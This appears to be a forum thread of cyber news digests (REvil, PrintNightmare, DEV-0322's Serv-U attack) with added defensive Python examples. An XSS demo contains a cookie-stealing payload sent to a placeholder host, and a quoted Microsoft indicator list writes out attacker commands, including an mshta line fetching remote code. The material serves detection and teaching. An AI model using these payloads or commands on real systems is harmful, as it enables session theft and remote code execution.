Cyber thread: network espionage, tracking of mobile phones and WLANs, hacking, viruses, DoS etc.

Sol Oriens, a subcontractor for the U.S. Department of Energy (DOE) that works on nuclear weapons with the National Nuclear Security Administration (NNSA), last month was hit by a cyberattack that experts say came from the relentless REvil ransomware-as-a-service (RaaS) gang.

The Albuquerque, N.M. company’s website has been unreachable since at least June 3, but Sol Oriens officials confirmed to Fox News and to CNBC that the firm became aware of the breach sometime last month.

The company’s statement, captured in a Tweet stream posted by CNBC’s Eamon Javers on Thursday:

“In May 2021, Sol Oriens became aware of a cybersecurity incident that impacted our network environment. The investigation is ongoing, but we recently determined that an unauthorized individual acquired certain documents from our systems. Those documents are currently under review, and we are working with a third-party technological forensic firm to determine the scope of potential data that may have been involved. We have no current indication that this incident involves client classified or critical security-related information. Once the investigation concludes, we are committed to notifying individuals and entities whose information is involved …”

As Javers noted, “we don’t know everything this small company does,” but he posted a sample job posting that indicates that it handles nuclear weapons issues: “Senior Nuclear Weapon System Subject Matter. Expert with more than 20 years of experience with nuclear weapons like the W80-4.” The W80 is a type of nuclear warhead carried on air-launched cruise missiles.

According to an archived version and its LinkedIn profile, Sol Oriens is a “small, veteran-owned consulting firm focused on managing advanced technologies and concepts with strong potential for military and space applications” that works with the “Department of Defense and Department of Energy Organizations, Aerospace Contractors, and Technology Firms (sic) carry out complex programs. … We focus on ensuring that there are well-developed technologies available to maintain a strong National Defense.”
 
A secretive cyberintelligence firm claims to have created powerful hacking tools that can remotely monitor and take control of Android, MacOS and Windows devices. Designed for those looking to “investigate targets in tactical operations,” Mollitiam Industries is promoting tools that are capable of the “anonymous interception, and the remote and invisible control of targets connected to the internet,” according to documents seen by WIRED.

Marketing materials left exposed online by a third-party claim Mollitiam’s interception products, dubbed ‘Invisible Man’ and ‘Night Crawler,’ are capable of remotely accessing a target’s files, location, and covertly turning on a device’s camera and microphone. Its spyware is also said to be equipped with a keylogger, which means every keystroke made on an infected device – including passwords, search queries and messages sent via encrypted messaging apps – can be tracked and monitored.

To evade detection, the malware makes use of the company’s so-called “invisible low stealth technology” and its Android product is advertised as having “low data and battery consumption” to prevent people from suspecting their phone or tablet has been infected. Mollitiam is also currently marketing a tool that it claims enables “mass surveillance of digital profiles and identities” across social media and the dark web.
 
If remote attackers can run commands and automations in the War Room, they can potentially subvert ongoing security investigations, steal information about a victim’s cyber-defense action plans and more. According to Palo Alto’s online documentation, real-time investigations are facilitated through the War Room, which allows analysts (and on vulnerable systems, remote attackers) to do the following:
  • Run real-time security actions through the command-line interface, without switching consoles.
  • Run security playbooks, scripts and commands.
  • Collaborate and execute remote actions across integrated products.
  • Capture incident context from different sources.
  • Document all actions in one source.
  • Converse with others for joint investigations.

“When you open the War Room, you can see a number of entries such as commands, notes, evidence, tasks, etc.,” the documentation reads.

A mitigating factor however is the fact that an adversary, as mentioned, would need to have access to the same network that the Cortex XSOAR is attached to, requiring an earlier compromise or exploit.
 
A proof-of-concept for a critical Windows security vulnerability that allows remote code execution (RCE) was dropped on GitHub on Tuesday – and while it was taken back down within a few hours, the code was copied and is still out there circulating on the platform.

The bug (CVE-2021-1675) exists in the Windows Print Spooler and has been dubbed “PrintNightmare” by researchers. It was originally addressed in June’s Patch Tuesday updates from Microsoft as a minor elevation-of-privilege vulnerability, but the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.

“There are 40 entries in Microsoft’s list of affected products, from Windows 7 to Windows 10 and from Server 2008 to Server 2019,” Dirk Schrader, global vice president of security research at New Net Technologies (NNT), now part of Netwrix, told Threatpost. “Given this broad surface, it is likely that this vulnerability will become an element in the tool chain of current malware families.”

On Sunday, the QiAnXin security team tweeted a video showing successful RCE – but it held back any technical or PoC details. Two days later, though, a full-blown PoC with a complete technical analysis appeared on GitHub, authored by another security firm, Sangfor.
 
Qurium Media Foundation has reported a campaign of DDoS attacks on Filipino media outlets and human rights organisations that appear to be coming from the country's Department of Science and Technology (DOST) and Army.

"During the past month, Qurium has received brief but frequent denial attacks against the Philippine alternative media outlets Bulatlat and AlterMidya, as well as the human rights group Karapatan," said the Swedish digital rights, data protection, and internet security NGO in its online report.

The flooding of the websites with superfluous requests to overload them and render them inaccessible occurred on 17, 18 and 20 May, on 6 June, and again during the late night and early morning of 22–23 June.

On 18 May, a DOST machine ran a vulnerability scan on Bulatlat with what Qurium said resembled Xerosecurity's "Sn1per" tool. These types of network attack surface and risk assessments are rarely done without permission from a system owner, and are believed to be the perpetrators checking on the status of the cyberattacks.

A closer look by Qurium into the DOST machine's network revealed an identical firewall configuration, suggesting activity from another machine within the organisation. Its digital certificate was linked to an email address issued by the Office of the Assistant Chief of Staff for Intelligence (OG2-PAS) of the Philippine Army.

The attacks come at a time when the three targets reported about potential investigations into crimes against humanity for drug war killings, as well as low mass testing for COVID-19, and other items critical of Philippines President Rodrigo Duterte.

DOST originally denied involvement but said that the organisation assists "other government agencies by allowing the use of some of its IP addresses in the local networks of other government agencies."
 
The computer code behind the massive ransomware attack by the Russian-speaking hacking ring REvil was written so that the malware avoids systems that primarily use Russian or related languages, according to a new report by a cybersecurity firm. NBC News reports: It's long been known that some malicious software includes this feature, but the report by Trustwave SpiderLabs, obtained exclusively by NBC News, appears to be the first to publicly identify it as an element of the latest attack, which is believed to be the largest ransomware campaign ever. "They don't want to annoy the local authorities, and they know they will be able to run their business much longer if they do it this way," said Ziv Mador, Trustwave SpiderLabs' vice president of security research.

Trustwave said the ransomware "avoids systems that have default languages from what was the USSR region. This includes Russian, Ukrainian, Belarusian, Tajik, Armenian, Azerbaijani, Georgian, Kazakh, Kyrgyz, Turkmen, Uzbek, Tatar, Romanian, Russian Moldova, Syriac, and Syriac Arabic." In May, cybersecurity expert Brian Krebs noted that ransomware by DarkSide, the Russia-based group that attacked Colonial Pipeline in May, "has a hard-coded do-not-install list of countries," including Russia and former Soviet satellites that mostly have favorable relations with the Kremlin. In general, criminal ransomware groups are allowed to operate with impunity inside Russia and other former Soviet states as long as they focus their attacks on the United States and the West, experts say. Krebs noted that in some cases, the mere installation of a Russian language virtual keyboard on a computer running Microsoft Windows will cause malware to bypass that machine.
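The locale check the Trustwave quote describes, written out as an added example for this thread (it is not Trustwave's analysis code and not the malware's code). It takes the same two inputs the described check would take on Windows, the user default UI language and the list of installed keyboard layouts, and reports whether the malware would bail out. The LCID values are the Windows language identifiers for the locales named in the quote as I recall them from Microsoft's LCID table; treat that mapping as an assumption and verify it before relying on it. The `live_probe` branch only runs on Windows; the inputs in `main` are constructed.

```python
"""Simulation of the locale-based do-not-run check that Trustwave describes.

Added example for this thread; not Trustwave's code and not the malware's code.
The LCID mapping below is assumed (recalled from Microsoft's LCID table).
"""
import sys

# Assumed Windows LCID -> locale name for the languages listed in the quote.
EXCLUDED_LCIDS = {
    0x0419: "ru-RU",        # Russian
    0x0422: "uk-UA",        # Ukrainian
    0x0423: "be-BY",        # Belarusian
    0x0428: "tg-Cyrl-TJ",   # Tajik
    0x042B: "hy-AM",        # Armenian
    0x042C: "az-Latn-AZ",   # Azerbaijani (Latin)
    0x082C: "az-Cyrl-AZ",   # Azerbaijani (Cyrillic)
    0x0437: "ka-GE",        # Georgian
    0x043F: "kk-KZ",        # Kazakh
    0x0440: "ky-KG",        # Kyrgyz
    0x0442: "tk-TM",        # Turkmen
    0x0443: "uz-Latn-UZ",   # Uzbek (Latin)
    0x0843: "uz-Cyrl-UZ",   # Uzbek (Cyrillic)
    0x0444: "tt-RU",        # Tatar
    0x0418: "ro-RO",        # Romanian
    0x0818: "ro-MD",        # Romanian (Moldova)
    0x0819: "ru-MD",        # Russian (Moldova)
    0x045A: "syr-SY",       # Syriac
}


def language_id(value: int) -> int:
    """Low 16 bits: a keyboard-layout handle (HKL) keeps its language id there."""
    return value & 0xFFFF


def would_malware_skip(ui_lcid: int, keyboard_hkls) -> tuple:
    """Return (skip, reason) the way the described check would decide.

    ui_lcid: user default UI language (what GetUserDefaultUILanguage returns).
    keyboard_hkls: installed layouts (what GetKeyboardLayoutList returns).
    Checking the layouts as well as the UI language models the Krebs observation
    that merely adding a Russian keyboard can flip the decision.
    """
    lang = language_id(ui_lcid)
    if lang in EXCLUDED_LCIDS:
        return True, "ui language " + EXCLUDED_LCIDS[lang]
    for hkl in keyboard_hkls:
        lang = language_id(hkl)
        if lang in EXCLUDED_LCIDS:
            return True, "keyboard layout " + EXCLUDED_LCIDS[lang]
    return False, "no excluded language present"


def live_probe():
    """Read the real values on Windows via ctypes; returns None elsewhere."""
    if sys.platform != "win32":
        return None
    import ctypes
    kernel32 = ctypes.windll.kernel32
    user32 = ctypes.windll.user32
    ui_lcid = kernel32.GetUserDefaultUILanguage()
    count = user32.GetKeyboardLayoutList(0, None)  # 0/NULL -> number of layouts
    layouts = (ctypes.c_void_p * count)()
    user32.GetKeyboardLayoutList(count, layouts)
    return ui_lcid, [h or 0 for h in layouts]


if __name__ == "__main__":
    # Constructed inputs: en-US UI with a US layout, then the same machine
    # after a Russian keyboard layout (HKL 0x04190419) has been added.
    print("en-US, US keyboard only:", would_malware_skip(0x0409, [0x04090409]))
    print("en-US, Russian keyboard added:",
          would_malware_skip(0x0409, [0x04090409, 0x04190419]))
    live = live_probe()
    if live:
        print("this Windows host:", would_malware_skip(*live))
```

The point of running it as a defender is to see exactly how cheap the check is: it reads two values the OS hands over freely, so an operator who adds a layout to trip it is relying on the attacker not changing three lines of code.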
 
While reading the Russia propaganda thread, a really strange script popped up. What crap is this? Is someone phishing for something through the ads, and which party? :D :D :D
 
No, but it was exactly this kind of thing, and why specifically in the Russia thread - not elsewhere


Describing the dangers posed by cross-site scripting (XSS), CWE wrote: "The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site."
I scrolled back and forth through the propaganda-excess thread, didn't get the same thing again now.
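The cookie-theft scenario in the CWE quote above, shown as an added example that is not part of the thread and not CWE's text: a reflected rendering of user input with and without output encoding, plus the cookie attributes that make a stolen session cookie harder to get at. `attacker.example` is a placeholder host and the payload is constructed for the demo.

```python
"""Vulnerable vs hardened handling of the XSS case the CWE quote describes.

Added example for this thread; not from CWE or the forum post. The payload,
hostnames and session id are constructed placeholders.
"""
import html

# Constructed payload of the kind that ships document.cookie to a third party.
PAYLOAD = ("<script>new Image().src="
           "'https://attacker.example/c?'+document.cookie</script>")


def render_unsafe(comment: str) -> str:
    """Vulnerable: user input is placed into the HTML body verbatim."""
    return f"<p>{comment}</p>"


def render_safe(comment: str) -> str:
    """Hardened: output encoding for the HTML text context; quote=True also
    covers the attribute context, so the same helper is safe there."""
    return f"<p>{html.escape(comment, quote=True)}</p>"


def contains_script(document: str) -> bool:
    """True if the rendered document still carries a live <script> tag."""
    return "<script" in document.lower()


def session_cookie_header(session_id: str) -> str:
    """Session cookie with the attributes that blunt the two CWE dangers:
    HttpOnly keeps it out of document.cookie (theft via script), Secure keeps it
    off plain HTTP, SameSite=Lax limits requests sent 'on behalf of the victim'."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


def cookie_is_script_readable(set_cookie: str) -> bool:
    """Parse a Set-Cookie header and report whether page script could read it."""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie.split(";")[1:]}
    return "httponly" not in attrs


if __name__ == "__main__":
    print("unsafe :", render_unsafe(PAYLOAD))
    print("safe   :", render_safe(PAYLOAD))
    print("script survives unsafe render:", contains_script(render_unsafe(PAYLOAD)))
    print("script survives safe render  :", contains_script(render_safe(PAYLOAD)))
    print("cookie readable by script    :",
          cookie_is_script_readable(session_cookie_header("constructed-id")))
```

Encoding at the point of output is the fix; the cookie attributes are defence in depth for the case where some other injection point is missed.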
 
Do you get a lot of Russian-language ads? Is someone targeting these, good buddies or bad comrades? Me write too wrong, or interesting topic? Bad Finnish?

Wrong language settings on the laptop, or what causes this?
Da da, need to wipe the laptop
 
Khorosho!! Where are the scripts now? Or is it good evening, hybrid centre? :D

I'd buy coffee or beers if someone told me what this was
 
Well,

Everyone who has a Zyxel firewall / VPN GW at home or in their company has probably already received an email from Zyxel saying the firewalls were hacked months ago. From the outside it has been possible to make an SSL connection to the firewall and through that get at the internal network traffic.

As a corrective measure Zyxel is giving its customers a geoblocker for free. I have had that activated for years. From my own statistics I can say that the countries from which SSL connections to my firewall have been attempted tens of times a day are, in order, Russia, China, Ukraine and the UAE. Probably not because I am of particular interest, but because a hacker has obtained from somewhere a list of which IP addresses those firewalls sit at.

Applies to Zyxel's USG and ZyWall products.

So there's that.

Simpauttaja
 
Luckily I haven't bought zyx-hell products in years, because they've been crap.
How lovely that you've known this. I'm so genuinely relieved that you haven't sunk into the deep end but can be genuinely present in this moment. Out of love for the rest of us, will you open the floodgates enough to tell us which firewall is not demonstrably crap?

Simpauttaja
 
On Tuesday, Microsoft said it was designating the hacking group for now as “DEV-0322.” “DEV” refers to a “development group” under study prior to when Microsoft researchers have a high confidence about the origin or identity of the actor behind an operation. The company said that the attackers are physically located in China and often rely on botnets made up of routers or other types of IoT devices.

“MSTIC has observed DEV-0322 targeting entities in the US Defense Industrial Base Sector and software companies,” researchers with the Microsoft Threat Intelligence Center wrote in a post. “This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.”

Beyond the three attacker-affiliated servers already disclosed by SolarWinds, Microsoft provided three additional indicators that people can use to determine if they were hacked. The indicators of compromise are:
  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:\Windows\Temp\Serv-U.bat
  • C:\Windows\Temp\test\current.dmp
  • The presence of suspicious exception errors, particularly in the DebugSocketlog.txt log file
  • C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
  • cmd.exe /c whoami > “./Client/Common/redacted.txt”
  • cmd.exe /c dir > “.\Client\Common\redacted.txt”
  • cmd.exe /c “C:\Windows\Temp\Serv-U.bat”
  • powershell.exe C:\Windows\Temp\Serv-U.bat
  • cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”
Tuesday’s post also provided new technical details about the attack. Specifically:

We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new global user to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these .Archive files.
Due to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, DebugSocketLog.txt. The process could also crash after a malicious command was run.
By reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.
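A hunt script for the Serv-U traces Microsoft describes above, added here as an example; it is not Microsoft's or SolarWinds' code. It walks a Serv-U install root and reports (1) files in `Client\Common` that are not in an operator-supplied baseline, the folder the attackers used to retrieve command output; (2) `.Archive` files in `Users\Global Users` for user names the operator does not recognise, the technique used to add an administrator; (3) exception lines in `DebugSocketLog.txt`; and (4) any of the published IoC addresses appearing in that log. The location of `DebugSocketLog.txt` directly under the install root is an assumption, as is the idea that a clean install's `Client\Common` contents can be enumerated into a baseline; the sample directory tree and log lines are constructed for the demo.

```python
"""Hunt for the DEV-0322 post-exploitation traces described in the MSTIC post.

Added example; not Microsoft's or SolarWinds' code. Assumptions: the Serv-U
root contains Client/Common, Users/Global Users and DebugSocketLog.txt in the
places used below, and the operator can supply a baseline of expected files.
"""
import re
import tempfile
from pathlib import Path

# Network indicators from the Microsoft list above (re-fanged for matching).
IOC_IPS = {"98.176.196.89", "68.235.178.32", "208.113.35.58",
           "144.34.179.162", "97.77.97.58"}
EXCEPTION_RE = re.compile(r"exception", re.IGNORECASE)


def hunt(serv_u_root, known_client_files, known_users):
    """Return a list of (finding_kind, detail) tuples for the given install."""
    root = Path(serv_u_root)
    findings = []

    # (1) Client/Common is reachable from the internet by default, so anything
    # not shipped with the product is a candidate for attacker command output.
    common = root / "Client" / "Common"
    if common.is_dir():
        for entry in common.iterdir():
            if entry.is_file() and entry.name not in known_client_files:
                findings.append(("unexpected-client-common-file", str(entry)))

    # (2) A crafted .Archive file in Global Users adds an account outside the UI.
    users_dir = root / "Users" / "Global Users"
    if users_dir.is_dir():
        for archive in users_dir.glob("*.Archive"):
            if archive.stem not in known_users:
                findings.append(("unknown-global-user", str(archive)))

    # (3)/(4) The exploit leaves exception lines in DebugSocketLog.txt; the same
    # log is a cheap place to look for the published addresses.
    log = root / "DebugSocketLog.txt"
    if log.is_file():
        for number, line in enumerate(log.read_text(errors="replace").splitlines(), 1):
            if EXCEPTION_RE.search(line):
                findings.append(("debug-log-exception", f"{log}:{number}"))
            for ip in IOC_IPS:
                if ip in line:
                    findings.append(("ioc-ip", f"{log}:{number} {ip}"))
    return findings


def build_sample_tree():
    """Constructed Serv-U tree containing each of the traces described above."""
    root = Path(tempfile.mkdtemp(prefix="servu-demo-"))
    common = root / "Client" / "Common"
    common.mkdir(parents=True)
    (common / "index.html").write_text("<html></html>\n")         # baseline file
    (common / "out.txt").write_text("nt authority\\system\n")      # piped whoami
    users = root / "Users" / "Global Users"
    users.mkdir(parents=True)
    (users / "alice.Archive").write_text("constructed legitimate user record\n")
    (users / "support.Archive").write_text("constructed crafted user record\n")
    (root / "DebugSocketLog.txt").write_text("\n".join([
        "07/13/2021 10:11:12 - Listener accepted connection from 203.0.113.5",
        "07/13/2021 10:11:13 - Unhandled exception in socket handler (constructed)",
        "07/13/2021 10:11:14 - Listener accepted connection from 144.34.179.162",
    ]) + "\n")
    return root


if __name__ == "__main__":
    demo_root = build_sample_tree()
    for kind, detail in hunt(demo_root, known_client_files={"index.html"},
                             known_users={"alice"}):
        print(f"{kind:32s} {detail}")
```

Run it against a real install with the baseline taken from a known-clean copy of the same Serv-U version; a hit on (2) or (1) is worth an immediate look, while (3) on its own can also be an ordinary crash and needs the timestamp compared with (4) and with the `C:\Windows\Temp` artefacts in the list above.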
 